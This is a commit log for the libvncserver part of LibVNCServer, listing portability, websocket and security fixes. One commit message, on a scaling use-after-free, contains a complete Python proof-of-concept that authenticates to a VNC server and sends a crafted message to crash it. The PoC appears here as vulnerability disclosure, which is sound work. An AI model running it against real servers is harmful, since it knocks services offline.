summaryrefslogtreecommitdiffstats
path: root/libvncserver
Commit message (Collapse)AuthorAgeFilesLines
* Enable AF_UNIX socket: ignore setsockopt TCP_NODELAY failure.Wen Shuguang2016-04-152-11/+4
|
* Fix some typos (found by codespell)Stefan Weil2015-10-0910-12/+12
| | | | Signed-off-by: Stefan Weil <sw@weilnetz.de>
* Do away with rfbint.h generation and use stdint.h directly instead.Christian Beier2015-05-281-2/+1
|
* Merge pull request #70 from maxnet/masterChristian Beier2015-04-171-0/+8
|\ | | | | httpd: disallow directory traversal
| * httpd: disallow directory traversalFloris Bos2015-03-291-0/+8
| | | | | | | | Signed-off-by: Floris Bos <bos@je-eigen-domein.nl>
* | Changed C++ style comments to C onesBenjamin Dürholt2015-04-132-2/+2
| |
* | prevent segfaultBenjamin Dürholt2015-04-102-1/+7
| |
* | Set autotools SOVERSION.Peter Spiess-Knafl2015-02-091-0/+1
| |
* | Replace SHA1 implementation with the one from RFC 6234.Christian Beier2015-02-012-2/+2
| |
* | Merge pull request #57 from maxnet/masterChristian Beier2015-01-183-0/+29
|\ \ | |/ | | Fix handling of multiple VNC commands per websockets frame
| * Fix handling of multiple VNC commands per websockets frameFloris Bos2015-01-173-0/+29
| | | | | | | | | | | | | | | | | | | | | | | | | | - When processing input, check if there is any extra data pending in the internal websocket frame and SSL buffers. - Prevents input events lagging behind because they get stuck in one of the buffers. Data pending in our own buffers cannot be detected with select() so was not processed until more input arrives from the network. - Closes # 55 Signed-off-by: Floris Bos <bos@je-eigen-domein.nl>
* | Merge pull request #56 from maxnet/masterChristian Beier2015-01-161-9/+14
|\ \ | |/ | | Only advertise xvp support when xvpHook is set
| * Only advertise xvp support when xvpHook is setFloris Bos2015-01-161-9/+14
| | | | | | | | | | | | | | Prevent that clients show "reboot" "power down" buttons that are not going to work. Signed-off-by: Floris Bos <bos@je-eigen-domein.nl>
* | Fix building with mingw-w64.Christian Beier2014-12-301-1/+3
|/
* Update comments regarding rfbClientConnectionGone().Christian Beier2014-10-211-2/+3
|
* Fix Use-After-Free vulnerability in LibVNCServer wrt scaling.Christian Beier2014-10-211-2/+0
| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | Reported by Ken Johnson <Ken.Johnson1@telus.com>. The vulnerability would occur in both the rfbPalmVNCSetScaleFactor and rfbSetScale cases in the rfbProcessClientNormalMessage function of rfbserver.c. Sending a valid scaling factor is required (non-zero) if (msg.ssc.scale == 0) { rfbLogPerror("rfbProcessClientNormalMessage: will not accept a scale factor of zero"); rfbCloseClient(cl); return; } rfbStatRecordMessageRcvd(cl, msg.type, sz_rfbSetScaleMsg, sz_rfbSetScaleMsg); rfbLog("rfbSetScale(%d)\n", msg.ssc.scale); rfbScalingSetup(cl,cl->screen->width/msg.ssc.scale, cl->screen->height/msg.ssc.scale); rfbSendNewScaleSize(cl); << This is the call that can trigger a free. return; at the end, both cases there is a call the rfbSendNewScaleSize function, where if the connection is subsequently disconnected after sending the VNC scaling message can lead to a free occurring. else { rfbResizeFrameBufferMsg rmsg; rmsg.type = rfbResizeFrameBuffer; rmsg.pad1=0; rmsg.framebufferWidth = Swap16IfLE(cl->scaledScreen->width); rmsg.framebufferHeigth = Swap16IfLE(cl->scaledScreen->height); rfbLog("Sending a response to a UltraVNC style frameuffer resize event (%dx%d)\n", cl->scaledScreen->width, cl->scaledScreen->height); if (rfbWriteExact(cl, (char *)&rmsg, sz_rfbResizeFrameBufferMsg) < 0) { rfbLogPerror("rfbNewClient: write"); rfbCloseClient(cl); rfbClientConnectionGone(cl); << Call which may can lead to a free. return FALSE; } } return TRUE; Once this function returns, eventually rfbClientConnectionGone is called again on the return from rfbProcessClientNormalMessage. In KRFB server this leads to an attempt to access client->data. POC script to trigger the vulnerability: ---snip--- import socket,binascii,struct,sys from time import sleep class RFB: INIT_3008 = "\x52\x46\x42\x20\x30\x30\x33\x2e\x30\x30\x38\x0a" AUTH_NO_PASS = "\x01" AUTH_PASS = "\x02" SHARE_DESKTOP = "\x01" def AUTH_PROCESS(self,data,flag): if flag == 0: # Get security types secTypeCount = data[0] secType = {} for i in range(int(len(secTypeCount))): secType[i] = data[1] return secType elif flag == 1: # Get auth result # 0 means auth success # 1 means failure return data[3] def AUTH_PROCESS_CHALLENGE(self, data, PASSWORD): try: from Crypto.Cipher import DES except: print "Error importing crypto. Please fix or do not require authentication" sys.exit(1) if len(PASSWORD) != 8: PASSWORD = PASSWORD.ljust(8, '\0') PASSWORD_SWAP = [self.reverse_bits(ord(PASSWORD[0])),self.reverse_bits(ord(PASSWORD[1])),self.reverse_bits(ord(PASSWORD[2])),self.reverse_bits(ord(PASSWORD[3])),self.reverse_bits(ord(PASSWORD[4])),self.reverse_bits(ord(PASSWORD[5])),self.reverse_bits(ord(PASSWORD[6])),self.reverse_bits(ord(PASSWORD[7]))] PASSWORD = (struct.pack("BBBBBBBB",PASSWORD_SWAP[0],PASSWORD_SWAP[1],PASSWORD_SWAP[2],PASSWORD_SWAP[3],PASSWORD_SWAP[4],PASSWORD_SWAP[5],PASSWORD_SWAP[6],PASSWORD_SWAP[7])) crypto = DES.new(PASSWORD) return crypto.encrypt(data) def reverse_bits(self,x): a=0 for i in range(8): a += ((x>>i)&1)<<(7-i) return a def main(argv): print "Proof of Concept" print "Copyright TELUS Security Labs" print "All Rights Reserved.\n" try: HOST = sys.argv[1] PORT = int(sys.argv[2]) except: print "Usage: python setscale_segv_poc.py <host> <port> [password]" sys.exit(1) try: PASSWORD = sys.argv[3] except: print "No password supplied" PASSWORD = "" vnc = RFB() remote = socket.socket(socket.AF_INET, socket.SOCK_STREAM) remote.connect((HOST,PORT)) # Get server version data = remote.recv(1024) # Send 3.8 version remote.send(vnc.INIT_3008) # Get supported security types data = remote.recv(1024) # Process Security Message secType = vnc.AUTH_PROCESS(data,0) if secType[0] == "\x02": # Send accept for password auth remote.send(vnc.AUTH_PASS) # Get challenge data = remote.recv(1024) # Send challenge response remote.send(vnc.AUTH_PROCESS_CHALLENGE(data,PASSWORD)) elif secType[0] == "\x01": # Send accept for None pass remote.send(vnc.AUTH_NO_PASS) else: print 'The server sent us something weird during auth.' sys.exit(1) # Get result data = remote.recv(1024) # Process result result = vnc.AUTH_PROCESS(data,1) if result == "\x01": # Authentication failure. data = remote.recv(1024) print 'Authentication failure. Server Reason: ' + str(data) sys.exit(1) elif result == "\x00": print "Authentication success." else: print 'Some other authentication issue occured.' sys.exit(1) # Send ClientInit remote.send(vnc.SHARE_DESKTOP) # Send malicious message print "Sending malicious data..." remote.send("\x08\x08\x00\x00") remote.close() if __name__ == "__main__": main(sys.argv) ---snap---
* Fix selData.buttonWidth calculationMaks Naumov2014-10-141-1/+1
| | | Operator "+" has a higher priority than "? :"
* Fix stack-based buffer overflowNicolas Ruff2014-10-071-1/+2
| | | | | | | There was a possible buffer overflow in rfbFileTransferOffer message when processing the FileTime. Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Fix multiple stack-based buffer overflows in file transfer featurenewsoft2014-10-061-8/+30
|
* Make sure that no integer overflow could occur during scalingnewsoft2014-10-061-1/+22
|
* Merge pull request #38 from LibVNC/autotools-fix-revisitedChristian Beier2014-10-021-1/+1
|\ | | | | Autotools fix revisited.
| * Rename obsolete INCLUDES to AM_CPPFLAGSBrian Bidulock2014-10-021-1/+1
| |
* | Close unclosed comments ;-)Johannes Schindelin2014-09-301-2/+2
| | | | | | | | Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* | A forgotten `#ifdef WIN32` broke UNIX build.Daniel Cohen Gindi2014-09-301-0/+2
| |
* | Signal is a fundamental UNIX function, and must be omitted for any windows ↵Daniel Cohen Gindi2014-09-201-1/+1
| | | | | | | | compilation
* | These are UNIX headers, and are not available on MSVCDaniel Cohen Gindi2014-09-201-0/+5
| |
* | On windows, use the Win32 calls for directory enumerations.Daniel Cohen Gindi2014-09-201-3/+78
| | | | | | | | We also do not need the conversion between UNIX values to Windows values in the RTF_FIND_DATA struct, as we already are on windows.
* | Generally adjusting headers for compiling on windows without the mixing of ↵Daniel Cohen Gindi2014-09-203-1/+15
| | | | | | | | Winsock 1 and 2.
* | Just use a macro to bridge to the Win32 version of `mkdir`Daniel Cohen Gindi2014-09-201-5/+6
| | | | | | | | The additional compat_mkdir function was not necessary at all.
* | Fixed a violation of the C89 standard ("declarations must come before ↵Daniel Cohen Gindi2014-09-203-10/+16
| | | | | | | | instructions")
* | A windows version for directory enumerationsDaniel Cohen Gindi2014-09-201-0/+147
| | | | | | | | Basically taken from https://github.com/danielgindi/FileDir with some adjustments
* | MSVC also has the __FUNCTION__ predefinedDaniel Cohen Gindi2014-09-201-1/+1
| |
* | `CreateDirectory` might clash with the `CreateDirectoryA`/`CreateDirectoryW` ↵Daniel Cohen Gindi2014-09-202-1/+13
| | | | | | | | macros on MSVC
* | Fail when NULL is passed to CreateFileListInfo()Daniel Cohen Gindi2014-09-201-2/+6
| | | | | | | | Passing NULL to sprintf() would most likely crash the program.
* | `strings.h` and `resolv.h` are not available on MSVC, and some POSIX ↵Daniel Cohen Gindi2014-09-204-1/+19
|/ | | | | | functions are renamed or deprecated For all of those missing/deprecated POSIX functions, we just add a macro mapping to the _underscored version of MSVC.
* Do not accept a scaling factor of zero on PalmVNCSetScaleFactor and SetScale ↵Nicolas Ruff2014-08-181-0/+14
| | | | client->server messages. This would cause a division by zero and crash the server.
* Check malloc() return value on client->server ClientCutText message. Client ↵Nicolas Ruff2014-08-181-0/+5
| | | | can send up to 2**32-1 bytes of text, and such a large allocation is likely to fail in case of high memory pressure. This would in a server crash (write at address 0).
* allow rfbInitSockets with non-ready states.Amandeep Singh2014-08-031-2/+3
| | | | | This allows for reinitializations of e. g. sockets in a SHUTDOWN state. The only state that doesn't make sense to reinitialize are READY states.
* Fix crash in krfbAmandeep Singh2014-08-031-4/+7
| | | | | Krfb crashes on quit, if any client is connected due to a rfbClientConnectionGone call missing
* Fix tyopJohannes Schindelin2014-03-311-1/+1
| | | | Signed-off-by: Johannes Schindelin <johannes.schindelin@gmx.de>
* Set opcode correctly for binary frames.Joel Martin2013-02-271-0/+1
|
* Work around a gcc bug with anonymous structs and unions.Raphael Kubo da Costa2012-09-141-10/+15
| | | | | | | | | | GCC < 4.6 failed to parse the declaration of ws_header_t correctly because it did not accept anonymous structs and unions. [1] Work around the bug by adding names to the unions and structs. Ugly, but works. [1] http://gcc.gnu.org/bugzilla/show_bug.cgi?id=4784
* Include stdio.h for snprintf(3)Raphael Kubo da Costa2012-09-141-0/+2
|
* Add the required headers for read(2)Raphael Kubo da Costa2012-09-141-0/+5
|
* Use htobeNN(3) to convert numbers in websocket.c.Raphael Kubo da Costa2012-09-141-14/+11
| | | | | | | | | byteswap.h exists only on glibc, so building libvncserver with websockets support was not possible in other systems. Replace the inclusion of byteswap.h and the WS_* definitions with calls to htobeNN, which should perform the same conversions, be more portable and avoid the need to check for the platform's endianness.
* Tune the definitions needed when building with -ansi.Raphael Kubo da Costa2012-09-144-2/+12
| | | | | | | | | | | | | The current definitions were mostly useful to glibc and followed its feature_test_macros(3) documentation. However, this means other platforms still had problems when building with strict compilation flags. _BSD_SOURCE, for example, is only recognized by glibc, and other platforms sometimes need _XOPEN_SOURCE instead, or even the removal of some definitions (such as the outdate _POSIX_SOURCE one). _POSIX_SOURCE also had to be conditionally defined in some places, as what it enables or disables during compilation varies across systems.
* Add some missing feature macro definitions.Raphael Kubo da Costa2012-09-142-0/+10
| | | | | | | Building with -ansi failed due to some code (as well as system headers) using non-C89 features. Fix that by adding the usual _POSIX_SOURCE and _BSD_SOURCE definitions already present in some other files.
* Use C-style comments in rfbconfig.h.cmake and C source code.Raphael Kubo da Costa2012-09-142-5/+5
| | | | | Using C++-style comments when building the code with -ansi does not work, so be more conservative with the comment style.
* Correctly include rfbconfig.h.Raphael Kubo da Costa2012-09-141-1/+1
| | | | | build_dir/rfb is not passed as an include directory automatically to the compiler, so including that file fails.
* Patched sockets.c to allow the use of IPv6 without IPv4.Oliver Loch2012-08-191-1/+6
| | | | As requested only those lines are indented that have been changed.